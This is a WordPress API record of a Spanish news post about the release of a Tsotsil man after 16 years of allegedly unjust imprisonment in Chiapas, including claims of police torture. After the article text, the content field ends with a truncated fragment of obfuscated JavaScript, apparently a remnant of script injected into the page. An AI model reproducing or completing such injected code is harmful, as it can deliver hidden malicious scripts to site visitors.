{"id":19180,"date":"2024-12-05T05:28:40","date_gmt":"2024-12-05T05:28:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19180"},"modified":"2024-12-05T05:28:41","modified_gmt":"2024-12-05T05:28:41","slug":"liberan-a-indigena-tsotsil-tras-16-anos-de-injusta-prision","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19180","title":{"rendered":"Liberan a ind\u00edgena tsotsil tras 16 a\u00f1os de injusta prisi\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241204-WA0016-1024x771.jpg\" alt=\"\" class=\"wp-image-19181\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241204-WA0016-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241204-WA0016-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241204-WA0016-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241204-WA0016-1536x1156.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241204-WA0016.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>4 de diciembre del 2024. San Crist\u00f3bal de las Casas.- Los Solidarios de la Voz del Amate informaron sobre la liberaci\u00f3n de Nicol\u00e1s G\u00f3mez L\u00f3pez, ind\u00edgena tsotsil que permaneci\u00f3 encarcelado injustamente durante 16 a\u00f1os en el Centro Estatal de Reinserci\u00f3n Social de Sentenciados (CERSS) N\u00famero 5. Su caso, identificado como la causa penal 106\/2008, es un ejemplo m\u00e1s de las irregularidades y violaciones a los derechos humanos en el sistema de justicia en M\u00e9xico.<\/p>\n\n\n\n<p>En conferencia de prensa, dieron a conocer que Nicol\u00e1s G\u00f3mez L\u00f3pez fue detenido junto a sus hermanos Mariano, Marcos, Mario y Mart\u00edn, todos tambi\u00e9n de apellidos G\u00f3mez L\u00f3pez, en el paraje Jolitontic, municipio de Chalchihuit\u00e1n. Sin pruebas suficientes, los cinco fueron condenados a 31 a\u00f1os y 9 meses de prisi\u00f3n. Durante su detenci\u00f3n, los hermanos fueron v\u00edctimas de tortura por parte de elementos de la polic\u00eda especializada del Ministerio P\u00fablico Investigador, denunciaron a sus familiares y organizaciones defensoras.<\/p>\n\n\n\n<p>Informaron que el padre de los detenidos, Mart\u00edn G\u00f3mez Luna, sufri\u00f3 igualmente tortura. &#8220;Su estado de salud se deterior\u00f3 y falleci\u00f3 bajo arraigo domiciliario en septiembre de 2019, dejando en evidencia las consecuencias devastadoras de estas pr\u00e1cticas ilegales&#8221;.<\/p>\n\n\n\n<p>Actualmente, las denuncias penales correspondientes han sido presentadas ante la Unidad Especializada de Investigaci\u00f3n del Delito de Tortura de la Fiscal\u00eda de Derechos Humanos. Adem\u00e1s, Nicol\u00e1s y otros presos, como Roberto Mart\u00ednez P\u00e9rez, quien lleva 18 a\u00f1os encarcelado injustamente bajo la causa penal 093\/2006, esperan los resultados de sus evaluaciones conforme al Protocolo de Estambul, herramienta clave para acreditar actos de tortura.<\/p>\n\n\n\n<p>Los Solidarios de la Voz del Amate exigen justicia y libertad para todos los presos pol\u00edticos y v\u00edctimas de detenciones arbitrarias en Chiapas. \u201cEl Estado tiene una deuda pendiente con los pueblos ind\u00edgenas y con quienes se encuentran encarcelados injustamente. Libertad para los Solidarios de la Voz del Amate\u201d, concluyeron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 4 de diciembre del 2024. San Crist\u00f3bal de las Casas.- Los Solidarios de la Voz del Amate informaron sobre la liberaci\u00f3n de Nicol\u00e1s G\u00f3mez L\u00f3pez, ind\u00edgena tsotsil que permaneci\u00f3 encarcelado injustamente durante 16 a\u00f1os en el Centro Estatal de Reinserci\u00f3n Social de Sentenciados (CERSS) N\u00famero 5. Su caso, identificado como la causa &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19181,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19180","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19180","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19180"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19180\/revisions"}],"predecessor-version":[{"id":19182,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19180\/revisions\/19182"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19181"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19180"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19180"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19180"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}